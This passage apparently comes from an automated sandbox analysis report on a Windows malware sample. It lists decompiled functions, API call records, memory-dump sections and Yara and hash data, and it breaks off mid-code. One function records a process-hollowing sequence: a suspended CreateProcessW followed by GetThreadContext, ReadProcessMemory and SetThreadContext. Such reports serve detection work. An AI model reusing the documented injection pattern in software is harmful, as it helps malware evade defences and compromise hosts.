						return E00C4AF95(_t64);
					} else {
						continue;
					}
					L25:
				}
				return _t19;
				goto L25;
			}

0x00c44681
0x00c44681
0x00c44681
0x00c44681
0x00c44696
0x00c44699
0x00c446a1
0x00000000
0x00000000
0x00c4468c
0x00c44692
0x00c44694
0x00c446a5
0x00c446ae
0x00c446b5
0x00c446c3
0x00c446ca
0x00c446cf
0x00c446d0
0x00c446d2
0x00c446d7
0x00c446de
0x00c446e9
0x00c446f0
0x00c446f6
0x00c446fb
0x00c44705
0x00000000
0x00c44707
0x00c4470c
0x00c44713
0x00000000
0x00c44715
0x00c44715
0x00c44717
0x00c4471e
0x00c44720
0x00c44726
0x00c44726
0x00c44726
0x00c44726
0x00c4471e
0x00c44713
0x00c446f2
0x00c446f2
0x00c446f2
0x00c446f2
0x00c44729
0x00c4472c
0x00c44731
0x00c44733
0x00c44737
0x00c4473c
0x00c4473d
0x00c44742
0x00c44744
0x00c44748
0x00c4474d
0x00c4474e
0x00c44753
0x00c44757
0x00c44762
0x00c44767
0x00c4476c
0x00c44776
0x00c44778
0x00c4477c
0x00c44781
0x00c44787
0x00c44789
0x00c4478d
0x00c44792
0x00c4479b
0x00c4479d
0x00c447a0
0x00c447a5
0x00c447a6
0x00c447ab
0x00c447b0
0x00c447b1
0x00c447b7
0x00c447bd
0x00c447c5
0x00c447c7
0x00c447ca
0x00c447cc
0x00c447cf
0x00c447cf
0x00c447d4
0x00c44809
0x00c44817
0x00000000
0x00000000
0x00000000
0x00000000
0x00c44694
0x00c446a4
0x00000000

APIs

_malloc.LIBCMT ref: 00C44699

Part of subcall function 00C45B0A: __FF_MSGBANNER.LIBCMT ref: 00C45B21
Part of subcall function 00C45B0A: __NMSG_WRITE.LIBCMT ref: 00C45B28
Part of subcall function 00C45B0A: HeapAlloc.KERNEL32(00F70000,00000000,00000001,00000000,?,00000000,?,00C47CF2,00000000,00000000,00000000,?,?,00C46B99,00000018,00C5D290), ref: 00C45B4D

std::exception::exception.LIBCMT ref: 00C446B5
__CxxThrowException@8.LIBCMT ref: 00C446CA

Part of subcall function 00C4560A: RaiseException.KERNEL32(?,?,00C5D720,00000000,?,?,00C410C8,00000000,00C5D720,00000000), ref: 00C4565B

_fast_error_exit.LIBCMT ref: 00C44737
_fast_error_exit.LIBCMT ref: 00C44748
__RTC_Initialize.LIBCMT ref: 00C4474E
__ioinit0.LIBCMT ref: 00C44757
GetCommandLineA.KERNEL32(00C5D128,00000014,00000018,00C5D03C,?,00000001), ref: 00C4475C
___crtGetEnvironmentStringsA.LIBCMT ref: 00C44767
__setargv.LIBCMT ref: 00C44771
__setenvp.LIBCMT ref: 00C44782
__cinit.LIBCMT ref: 00C44795

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _fast_error_exit$AllocCommandEnvironmentExceptionException@8HeapInitializeLineRaiseStringsThrow___crt__cinit__ioinit0__setargv__setenvp_mallocstd::exception::exception
String ID:
API String ID: 3599565352-0
Opcode ID: 2901bf556c2b08360993913382c8b6c59c86ff2b394df85dfdb18b2def825d14
Instruction ID: 9ea46c068803a08b7758e8d3fdd3c0ade6497fc00896515f94c2d942feace92d
Opcode Fuzzy Hash: 2901bf556c2b08360993913382c8b6c59c86ff2b394df85dfdb18b2def825d14
Instruction Fuzzy Hash: A7310670980705DBEB14BBB4EC86BAD36A8BF01755F200169FA04D61D2DFB18A84A752

Uniqueness

Uniqueness Score: -1.00%

Function 00C6107C, Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00C61142
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,00C61B95,81AF6D4E,00C616D8), ref: 00C6116C
ReadFile.KERNELBASE(00000000,00000000,00C616D8,?,00000000,?,?,?,?,?,?,?,?,?,00C61B95,81AF6D4E), ref: 00C61183
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,00C61B95,81AF6D4E,00C616D8), ref: 00C611A5
FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C61B95), ref: 00C61217
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 00C61222
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,00C61B95,81AF6D4E,00C616D8,00000000), ref: 00C6126D

Memory Dump Source

Source File: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 986fbedffabcb7106b8077ed15aeab1500e953d6495bb1547b1e5107b8f5c316
Instruction ID: 3e701c53a4f3ba1e309a5b826f4c75e26ae586f8fcbf4ed579b6915cf28b9cae
Opcode Fuzzy Hash: 986fbedffabcb7106b8077ed15aeab1500e953d6495bb1547b1e5107b8f5c316
Instruction Fuzzy Hash: 3B519D71E00709ABCF209BF5DCC5BAEB7B9EF58751F184425FA11F7290E6709A008B64

Uniqueness

Uniqueness Score: -1.00%

Function 00C62B83, Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8815d30b267949362fd0234a46b44d8e6883f6537f95b79fe4ca95ed2fdbbd3b
Instruction ID: 9d2f85ae4713eac0bc36edcb92dca3119f055ca6a3b1d16bf60ebd2b978dc9fc
Opcode Fuzzy Hash: 8815d30b267949362fd0234a46b44d8e6883f6537f95b79fe4ca95ed2fdbbd3b
Instruction Fuzzy Hash: 1051E470E4460EFFEF219FA1CC86BAEBAB5FF08745F204464F611B91A0D7714A50AB54

Uniqueness

Uniqueness Score: -1.00%

Function 00C60934, Relevance: 6.5, APIs: 4, Instructions: 467threadprocessinjectionCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,0000000F,0000000F,0000000F,0000000F,08000004,0000000F,0000000F,?,?,00000000,7885A56E,00000000,3921378E,00000000,2FFE2C64), ref: 00C60BF9
GetThreadContext.KERNELBASE(?,?), ref: 00C60C1B
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C60C3E
SetThreadContext.KERNELBASE(?,00010007,?,?,?,00000004,00000000,?,?,?,?,000000FF,?,00000000,00000000,00000000), ref: 00C60E01

Memory Dump Source

Source File: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ContextProcessThread$CreateMemoryRead
String ID:
API String ID: 3262821800-0
Opcode ID: e8ce5b77299e81b3f52a41e5cbbe7cc35d27d67c4ce09ab83bda469318bb867a
Instruction ID: b9001cea1530ad0a00a03c2d08048eb1ca07933ca7321f05d580d0f8a60e7114
Opcode Fuzzy Hash: e8ce5b77299e81b3f52a41e5cbbe7cc35d27d67c4ce09ab83bda469318bb867a
Instruction Fuzzy Hash: E1026D71A50318AAEF21DBA4DD81BEEB7B4FF44700F24445AE518FB2A0E7B55E80CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00C622BB, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 00C627AC

Strings

D, xrefs: 00C6274C
67e14b3030ec4b1293fcc640ac4326b6, xrefs: 00C626FF, 00C62702

Memory Dump Source

Source File: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: 67e14b3030ec4b1293fcc640ac4326b6$D
API String ID: 621844428-1500681715
Opcode ID: 286a50e8b26be3369dd2833cd310189e77655d2bb5a5bea8637b8b2bd505bb51
Instruction ID: 73bf1304696f8607d3250209c3c906fe87258e0dab55255d8f2f90e7a180dc11
Opcode Fuzzy Hash: 286a50e8b26be3369dd2833cd310189e77655d2bb5a5bea8637b8b2bd505bb51
Instruction Fuzzy Hash: 62F18F25D54398EDEB61CBA8EC52BEDB7B5AF04B10F10548AE508FE2D1D3B10B84DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00C62D77, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 00C62D2C: GetFileAttributesW.KERNELBASE(?,?,8A5B2944,00C62B10,?,?,?), ref: 00C62D4D

CreateDirectoryW.KERNELBASE(?,00000000,?,?,1A6CF026,?,?,?,00C62B10,?,?,?), ref: 00C62DAD

Memory Dump Source

Source File: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 168c7bb68cb3cc5d081176c2fca2f6e4e9f2ea414168ce9225aa1f8103246f45
Instruction ID: 4815a37c799a46073ccddf7d0c04ddef02e86c9db9ec1ec10b2acf189acecd89
Opcode Fuzzy Hash: 168c7bb68cb3cc5d081176c2fca2f6e4e9f2ea414168ce9225aa1f8103246f45
Instruction Fuzzy Hash: D6E092B0910948BACF316F71CC81EBE7AA8DB00781F204474FC11D5110E632CE10E650

Uniqueness

Uniqueness Score: -1.00%

Function 00C62D2C, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,8A5B2944,00C62B10,?,?,?), ref: 00C62D4D

Memory Dump Source

Source File: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bea7098ad911ba7a09a12908935b7382ed9f665a00244207880dc2d0bdf5d04f
Instruction ID: 6e33337f65298c552e27712604329fd332b0505b81bc1df2f0665483574378b6
Opcode Fuzzy Hash: bea7098ad911ba7a09a12908935b7382ed9f665a00244207880dc2d0bdf5d04f
Instruction Fuzzy Hash: C3F0C071C0061CEFDB20EFA8C859AADBB70EB01715F2086A5E864662A1D7714B51DB51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C4F48B, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C4F48B(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x00c4f490
0x00c4f4a0

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C49B7D,?,?,?,00000000), ref: 00C4F490
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00C4F499

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 63b466766239e3b079be042f467c598ed406eab9516d9f99d0d50a8926cefda0
Instruction ID: 45af01e74c892004830cda61a4b457b6e9f896aff6253faea181eaa59daf57db
Opcode Fuzzy Hash: 63b466766239e3b079be042f467c598ed406eab9516d9f99d0d50a8926cefda0
Instruction Fuzzy Hash: 82B0923508830CEBCB002BD2EC09B4D3F28EB84663F004010F60D740E18F6254988AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C4F54A, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

EnumSystemLocalesEx.KERNEL32(00000000,00000000,00000000,00000000,?,00C526D0,00C5276E,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00C4F558

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 4f1c8e62d4fc0a22ce33c495695cd7c44839b6fd6625202d11db38568a7685f2
Instruction ID: 77c01ca737ecdf7d1c6a4fc8a25ef3b8ae9df69a663a042a1e2881b89a3e3979
Opcode Fuzzy Hash: 4f1c8e62d4fc0a22ce33c495695cd7c44839b6fd6625202d11db38568a7685f2
Instruction Fuzzy Hash: D4C0483604020CBBCF022F81EC05B9A3F2AFB486A1F048010FA18280A0CB72A564AB84

Uniqueness

Uniqueness Score: -1.00%

Function 00C4F560, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(00000000,00000000,00000002,?,?,00C4B511,?,?,?,00000002,00000000,00000000,00000000), ref: 00C4F56F

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e13e873a157f19226140437fbd525b044ff3c560f8521504c5676b0dcaad0fe9
Instruction ID: cd5673c9342e4cd05fa46b1023c0849efe7a2c49f160d80608b88a029ce1fbd7
Opcode Fuzzy Hash: e13e873a157f19226140437fbd525b044ff3c560f8521504c5676b0dcaad0fe9
Instruction Fuzzy Hash: 5AC0483600020EFBCF025F81ED04A9E3F2AFB48261B048010FA1824030DB339974AB99

Uniqueness

Uniqueness Score: -1.00%

Function 00C4F468, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C4F468(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x00c4f475

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00C4B630,00C4B5E5), ref: 00C4F46E

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5d1c176bd05ec5eace1a0a7ee4581de3ac4d6702a1340c6133ad380037820fd7
Instruction ID: 2f8beb4d9175eb7c2249350f4e921323e6b3b0fc2319576a7f304df245f45414
Opcode Fuzzy Hash: 5d1c176bd05ec5eace1a0a7ee4581de3ac4d6702a1340c6133ad380037820fd7
Instruction Fuzzy Hash: 60A0123000020CE78A001B81EC045487F1CD7401617004010F40C100628B32545445A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C4A5C8, Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C4A5C8() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0xcc5ae4 = _t3;
				return 0 | _t3 != 0x00000000;
			}

0x00c4a5c8
0x00c4a5d5
0x00c4a5dc

APIs

GetProcessHeap.KERNEL32(00C44731,00C5D128,00000014,00000018,00C5D03C,?,00000001), ref: 00C4A5C8

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 97791e84142b1ffe64f4f2cbbd27794f1e9603bd11ea776efd94875e193a1071
Instruction ID: 62bbe0fc952e2c1be3cbc6bf0ae34df003ece3a2e51d4c9f4d32f10b1fc0a360
Opcode Fuzzy Hash: 97791e84142b1ffe64f4f2cbbd27794f1e9603bd11ea776efd94875e193a1071
Instruction Fuzzy Hash: A4B012B4302A024F47488B3AED5435F36E8570C102300003EB003D5960DF2084A0AB00

Uniqueness

Uniqueness Score: -1.00%

Function 00C48FC4, Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C48FC4(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
